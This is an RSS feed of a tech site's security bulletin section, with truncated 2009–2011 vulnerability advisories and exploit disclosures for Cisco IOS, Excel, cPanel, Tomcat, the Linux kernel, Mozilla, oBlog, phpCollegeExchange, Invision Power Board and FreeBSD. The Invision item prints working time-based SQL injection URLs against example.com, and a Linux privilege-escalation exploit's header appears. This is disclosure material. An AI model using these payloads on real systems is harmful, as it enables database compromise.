<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>GO IT WORLD &#124; IT TECH &#124; IT NEWS &#187; Security Bulletin</title>
	<atom:link href="http://www.goitworld.com/category/the-security-world/security-bulletin/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.goitworld.com</link>
	<description>goitworld.com</description>
	<lastBuildDate>Tue, 10 Jan 2012 10:03:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.1.2</generator>
		<item>
		<title>Cisco IOS Software IPv6 Denial of Service Vulnerability</title>
		<link>http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/</link>
		<comments>http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/#comments</comments>
		<pubDate>Tue, 04 Oct 2011 12:43:07 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[cisco]]></category>
		<category><![CDATA[denial of service]]></category>
		<category><![CDATA[ios]]></category>
		<category><![CDATA[ipv6]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/</guid>
		<description><![CDATA[<p style="float: right;margin: 4px;">


</p><h5>Advisory ID: cisco-sa-20110928-ipv6</h5>
<h6><a href="http://www.cisco.com/en/US/products/products_security_advisory09186a0080b95d59.shtml">http://www.cisco.com/warp/public/707/cisco-sa-20110928-ipv6.shtml</a></h6>
<h4>Revision 1.1</h4>
<h5>Last Updated 2011 September 30 2330 UTC (GMT)</h5>
<h5>For Public Release 2011 September 28 1600 UTC (GMT) </h5>
<hr />
<h4>Contents</h4>
<blockquote><p><b><a href="http://www.cisco.com/en/US/products/#summary">Summary</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#affected">Affected Products</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#details">Details</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#vulnerability">Vulnerability Scoring Details</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#impact">Impact</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#software">Software Versions and Fixes</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#workarounds">Workarounds</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#fixes">Obtaining Fixed Software</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#exploitation">Exploitation and Public Announcements</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#status">Status of this Notice: FINAL</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#distribution">Distribution</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#revision">Revision History</a></b>    <br /><b><a href="http://www.cisco.com/en/US/products/#secpro">Cisco Security Procedures</a></b></p></blockquote>
<hr />
<h4><a name="summary">Summary</a></h4>
<p>Cisco IOS Software contains a vulnerability in the IP version 6 (IPv6) protocol stack implementation that could allow an unauthenticated, remote attacker to&#8230; <a href="http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/cisco-ios-software-ipv6-denial-of-service-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Excel Record Integer Signedness Vulnerability</title>
		<link>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/</link>
		<comments>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/#comments</comments>
		<pubDate>Fri, 16 Sep 2011 05:44:50 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[execl]]></category>
		<category><![CDATA[microsoft]]></category>
		<category><![CDATA[record integer signedness]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/</guid>
		<description><![CDATA[<h6>I. BACKGROUND</h6>
<p>Excel is the spreadsheet application included with Microsoft Corp.&#8217;s Office productivity software suite. More information is available at the following website: </p>
<p><a href="http://office.microsoft.com/excel/">http://office.microsoft.com/excel/</a></p>
<h6>II. DESCRIPTION</h6>
<p>Remote exploitation of an integer signedness vulnerability in Microsoft Corp.&#8217;s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. </p>
<p>The vulnerability is an integer signedness issue that leads to an invalid array indexing vulnerability. It is triggered by a certain record with a negative &#8216;iax&#8217; field. </p>
<p>It is possible to pass negative 16-bit values, which are later sign extended to 32 bits. The sign&#8230; <a href="http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/microsoft-excel-record-integer-signedness-vulnerability/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>cPanel &lt; 11.30.2 Multiple CSRF Vulnerabilities</title>
		<link>http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/</link>
		<comments>http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/#comments</comments>
		<pubDate>Wed, 14 Sep 2011 07:20:52 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[cpanel]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/</guid>
		<description><![CDATA[<p>Test Code:</p>
<blockquote><p>[+] Info=======================================================</p>
<p>[-] Exploit Title: cPanel &#60; 11.30.2 Multiple CSRF Vulnerabilities      <br />[-] Author: Net.Edit0r       <br />[-] Home : Black-HG.Org ~ h4ckcity.org       <br />[-] Version: 11.30.2       <br />[-] Software Link: <a href="http://cpanel.net">http://cpanel.net</a>       <br />[-] Email : Black.hat.tm[at]Gmail[dot]Com / Net.Edit0r[at]att[dot]net       <br />[-] Date : 27/08/2011       <br />[-] CVE : N/A       <br />[-] Vedio Demo : <a href="http://www.black-hg.org/Vedioz/cpanel.rar">http://www.black-hg.org/Vedioz/cpanel.rar</a>       <br />[-] Tnx2 : A.Cr0x &#38; 3H34N &#38; 4m!n &#38; Cyrus &#38; tHe.k!ll3r &#38; Mr.XHat &#38; Mikili</p>
<p>[+] Exploit=====================================================</p>
<p>[-]&#160; Introduction :</p>
<p>cPanel versions below and excluding 11.30.2 , are vulnerable to CSRF which      <br />leads to Change email address script of</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/cpanel-11-30-2-multiple-csrf-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Apache Tomcat Authentication bypass and information disclosure</title>
		<link>http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/</link>
		<comments>http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/#comments</comments>
		<pubDate>Fri, 02 Sep 2011 15:03:23 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[authentication bypass]]></category>
		<category><![CDATA[disclosure]]></category>
		<category><![CDATA[tomcat]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/</guid>
		<description><![CDATA[<p>Severity: Important</p>
<p>Vendor: The Apache Software Foundation</p>
<p>Versions Affected:   <br />- Tomcat 7.0.0 to 7.0.20    <br />- Tomcat 6.0.0 to 6.0.33    <br />- Tomcat 5.5.0 to 5.5.33    <br />- Earlier, unsupported versions may also be affected</p>
<p>Description:   <br />Apache Tomcat supports the AJP protocol which is used with reverse    <br />proxies to pass requests and associated data about the request from the    <br />reverse proxy to Tomcat. The AJP protocol is designed so that when a    <br />request includes a request body, an unsolicited AJP message is sent to    <br />Tomcat that includes the first part (or possibly all) of&#8230; <a href="http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/apache-tomcat-authentication-bypass-and-information-disclosure/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Linux Kernel &lt; 2.6.37-rc2 ACPI custom_method Privilege Escalation</title>
		<link>http://www.goitworld.com/linux-kernel-2-6-37-rc2-acpi-custom_method-privilege-escalation/</link>
		<comments>http://www.goitworld.com/linux-kernel-2-6-37-rc2-acpi-custom_method-privilege-escalation/#comments</comments>
		<pubDate>Fri, 05 Aug 2011 03:57:03 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[Escalation]]></category>
		<category><![CDATA[kernel]]></category>
		<category><![CDATA[linux]]></category>
		<category><![CDATA[privilege]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/linux-kernel-2-6-37-rc2-acpi-custom_method-privilege-escalation/</guid>
		<description><![CDATA[<p>&#160;&#160; This custom_method file allows to inject custom ACPI methods into the ACPI interpreter tables. This control file was introduced with world writeable permissions in Linux Kernel 2.6.33.   </p>
<blockquote><p>/*     <br /> * american-sign-language.c      <br /> *      <br /> * Linux Kernel &#60; 2.6.37-rc2 ACPI custom_method Privilege Escalation      <br /> * Jon Oberheide &#60;jon@oberheide.org&#62;      <br /> * <a href="http://jon.oberheide.org">http://jon.oberheide.org</a>      <br /> *       <br /> * Information:      <br /> *      <br /> *&#160;&#160; <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347</a>      <br /> *      <br /> *&#160;&#160; This custom_method file allows to inject custom ACPI methods into the ACPI      <br /> *&#160;&#160; interpreter tables. This control file</p></blockquote><p>&#8230; <a href="http://www.goitworld.com/linux-kernel-2-6-37-rc2-acpi-custom_method-privilege-escalation/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/linux-kernel-2-6-37-rc2-acpi-custom_method-privilege-escalation/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Mozilla Foundation Security Advisory 2011-20</title>
		<link>http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/</link>
		<comments>http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/#comments</comments>
		<pubDate>Thu, 23 Jun 2011 14:53:49 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[advisory]]></category>
		<category><![CDATA[foundation]]></category>
		<category><![CDATA[Mozilla]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[vulnerability]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/</guid>
		<description><![CDATA[<p>Title: Use-after-free vulnerability when viewing XUL document with script disabled   <br />Impact: Critical    <br />Announced: June 21, 2011    <br />Reporter: Martin Barbella    <br />Products: Firefox, Thunderbird, SeaMonkey    <br />Fixed in: Firefox 5    <br />Firefox 3.6.18    <br />Thunderbird 3.1.11</p>
<h5>Description</h5>
<p>Security researcher <strong>Martin Barbella</strong> reported that under certain conditions, viewing a XUL document while JavaScript was disabled caused deleted memory to be accessed. This flaw could potentially be used by an attacker to crash a victim&#8217;s browser and run arbitrary code on their computer.</p>
<h5>References</h5>
<ul>
<li><a href="https://bugzilla.mozilla.org/show_bug.cgi?id=617247">https://bugzilla.mozilla.org/show_bug.cgi?id=617247</a></li>
<li><a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2373">CVE-2011-2373</a></li>
</ul>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/mozilla-foundation-security-advisory-2011-20/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>oBlog Persistant XSS, CSRF, Admin Bruteforce</title>
		<link>http://www.goitworld.com/oblog-persistant-xss-csrf-admin-bruteforce/</link>
		<comments>http://www.goitworld.com/oblog-persistant-xss-csrf-admin-bruteforce/#comments</comments>
		<pubDate>Wed, 16 Dec 2009 10:52:27 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[bruteforce]]></category>
		<category><![CDATA[csrf]]></category>
		<category><![CDATA[oblog]]></category>
		<category><![CDATA[persistant xss]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/oblog-persistant-xss-csrf-admin-bruteforce/</guid>
		<description><![CDATA[<p>[-------------------------------------------------------------------------------------------------]   <br />[&#160;&#160; Application: oBlog&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ]    <br />[&#160;&#160; Version: the only one there is :)&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ]    <br />[&#160;&#160; Download: <a href="http://www.dootzky.com/images/projects/oBlog.zip">http://www.dootzky.com/images/projects/oBlog.zip</a>&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ]    <br />[&#160;&#160; Author of this full disclosure: Milos Zivanovic&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ]    <br />[&#160;&#160; Vulnerabilities: Persistant XSS, CSRF, Admin Bruteforce...&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; ]    <br />[-------------------------------------------------------------------------------------------------]    <br />Author of the application is contacted and author of this paper is not responsible for anything    <br />you do after reading this text.    <br />[#] Content:    <br /> &#124;&#8211;Persistant XSS    <br /> &#124;&#160; &#124;    <br /> &#124;&#160; &#124;&#8211;Vulnerable function    <br /> &#124;&#160; &#124;&#8211;XSS in article comments    <br /> &#124;&#160; &#124;&#8211;XSS in add new article / Edit&#8230; <a href="http://www.goitworld.com/oblog-persistant-xss-csrf-admin-bruteforce/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/oblog-persistant-xss-csrf-admin-bruteforce/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>phpCollegeExchange 0.1.5c Multiple SQL Injection Vulnerabilities</title>
		<link>http://www.goitworld.com/phpcollegeexchange-0-1-5c-multiple-sql-injection-vulnerabilities/</link>
		<comments>http://www.goitworld.com/phpcollegeexchange-0-1-5c-multiple-sql-injection-vulnerabilities/#comments</comments>
		<pubDate>Mon, 14 Dec 2009 05:57:33 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[phpcollegeexchange]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/phpcollegeexchange-0-1-5c-multiple-sql-injection-vulnerabilities/</guid>
		<description><![CDATA[<p> Name&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; phpCollegeExchange   <br /> Vendor&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; <a href="http://phpcollegeex.sourceforge.net">http://phpcollegeex.sourceforge.net</a>    <br /> Versions Affected 0.1.5c </p>
<p> Author&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; Salvatore Fresta aka Drosophila   <br /> Website&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; <a href="http://www.salvatorefresta.net">http://www.salvatorefresta.net</a>    <br /> Contact&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; salvatorefresta [at] gmail [dot] com    <br /> Date&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160;&#160; 2009-12-11 </p>
<p>X. INDEX </p>
<p> I.&#160;&#160;&#160; ABOUT THE APPLICATION   <br /> II.&#160;&#160; DESCRIPTION    <br /> III.&#160; ANALYSIS    <br /> IV.&#160;&#160; SAMPLE CODE    <br /> V.&#160;&#160;&#160; FIX    <br /> VI.&#160;&#160; DISCLOSURE TIMELINE </p>
<p>I. ABOUT THE APPLICATION </p>
<p>PhpCollegeExchange&#160; is&#160; a&#160; full&#160; fledged college community   <br />website. </p>
<p>II. DESCRIPTION </p>
<p>This&#160; application&#160; is&#160; affected&#160;&#160; by&#160; many&#160; SQL&#160; Injection   <br />security flaws. In order&#8230; <a href="http://www.goitworld.com/phpcollegeexchange-0-1-5c-multiple-sql-injection-vulnerabilities/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/phpcollegeexchange-0-1-5c-multiple-sql-injection-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>6</slash:comments>
		</item>
		<item>
		<title>Invision Power Board SQL Injection Vulnerabilities</title>
		<link>http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/</link>
		<comments>http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/#comments</comments>
		<pubDate>Mon, 07 Dec 2009 03:32:13 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[invision]]></category>
		<category><![CDATA[power board]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[Vulnerabilities]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/</guid>
		<description><![CDATA[<p>Version:</p>
<p>Invision Power Services Invision Power Board 2.3.6    <br />Invision Power Services Invision Power Board 3.0.4</p>
<p>Description:</p>
<p>The attacker can exploit the SQL-injection vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.</p>
<p>Test</p>
<p><a href="http://www.example.com/?app=forums&#38;amp;module=moderate&#38;amp;section=moderate&#38;amp;f=1&#38;amp;do=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;s">http://www.example.com/?app=forums&#38;amp;module=moderate&#38;amp;section=moderate&#38;amp;f=1&#38;amp;do=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;s</a>    <br />tarter=1%20AND%20starter_id=1%20OR%20substr(version(),1,1)=5%20AND%20sleep(15)%20&#8211;%20skip%20&#38;amp;auth_key=c4276b77602767228faa9760eb4a5abd </p>
<p><a href="http://www.example.com/forum/?act=mod&#38;amp;f=1&#38;amp;CODE=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;starter=1%20AND%20starter_id=1%20OR">http://www.example.com/forum/?act=mod&#38;amp;f=1&#38;amp;CODE=prune_move&#38;amp;df=3&#38;amp;pergo=50&#38;amp;dateline=0&#38;amp;state=open&#38;amp;ignore_pin=1&#38;amp;max=0&#38;amp;starter=1%20AND%20starter_id=1%20OR</a>    <br />%20substr(version(),1,1)=5%20AND%20sleep(16)%20&#8211;%20skip%20&#38;amp;auth_key=040c4a6e768d626b4c05a4bb0fbf315c </p>
]]></description>
		<wfw:commentRss>http://www.goitworld.com/invision-power-board-sql-injection-vulnerabilities/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>FreeBSD Security Advisories (security-advisories freebsd org)</title>
		<link>http://www.goitworld.com/freebsd-security-advisories-security-advisories-freebsd-org/</link>
		<comments>http://www.goitworld.com/freebsd-security-advisories-security-advisories-freebsd-org/#comments</comments>
		<pubDate>Sat, 05 Dec 2009 07:12:01 +0000</pubDate>
		<dc:creator>jason</dc:creator>
				<category><![CDATA[Security Bulletin]]></category>
		<category><![CDATA[advisories]]></category>
		<category><![CDATA[freebsd]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://www.goitworld.com/freebsd-security-advisories-security-advisories-freebsd-org/</guid>
		<description><![CDATA[<p>&#8212;&#8211;BEGIN PGP SIGNED MESSAGE&#8212;&#8211;   <br />Hash: SHA1    <br />========================================================================    <br />=====    <br />FreeBSD-SA-09:17.freebsd-update Security Advisory    <br />The FreeBSD Project    <br />Topic: Inappropriate directory permissions in freebsd-update(8)    <br />Category: core    <br />Module: usr.sbin    <br />Announced: 2009-12-03    <br />Credits: KAMADA Ken&#8217;ichi    <br />Affects: All supported versions of FreeBSD.    <br />Corrected: 2009-12-03 09:18:40 UTC (RELENG_8, 8.0-STABLE)    <br />2009-12-03 09:18:40 UTC (RELENG_8_0, 8.0-RELEASE-p1)    <br />2009-12-03 09:18:40 UTC (RELENG_7, 7.2-STABLE)    <br />2009-12-03 09:18:40 UTC (RELENG_7_2, 7.2-RELEASE-p5)    <br />2009-12-03 09:18:40 UTC (RELENG_7_1, 7.1-RELEASE-p9)    <br />2009-12-03 09:18:40 UTC (RELENG_6, 6.4-STABLE)    <br />2009-12-03 09:18:40 UTC (RELENG_6_4, 6.4-RELEASE-p8)    <br />2009-12-03 09:18:40 UTC (RELENG_6_3, 6.3-RELEASE-p14)    <br />For general information regarding&#8230; <a href="http://www.goitworld.com/freebsd-security-advisories-security-advisories-freebsd-org/" class="read_more">Read the rest</a></p>]]></description>
		<wfw:commentRss>http://www.goitworld.com/freebsd-security-advisories-security-advisories-freebsd-org/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

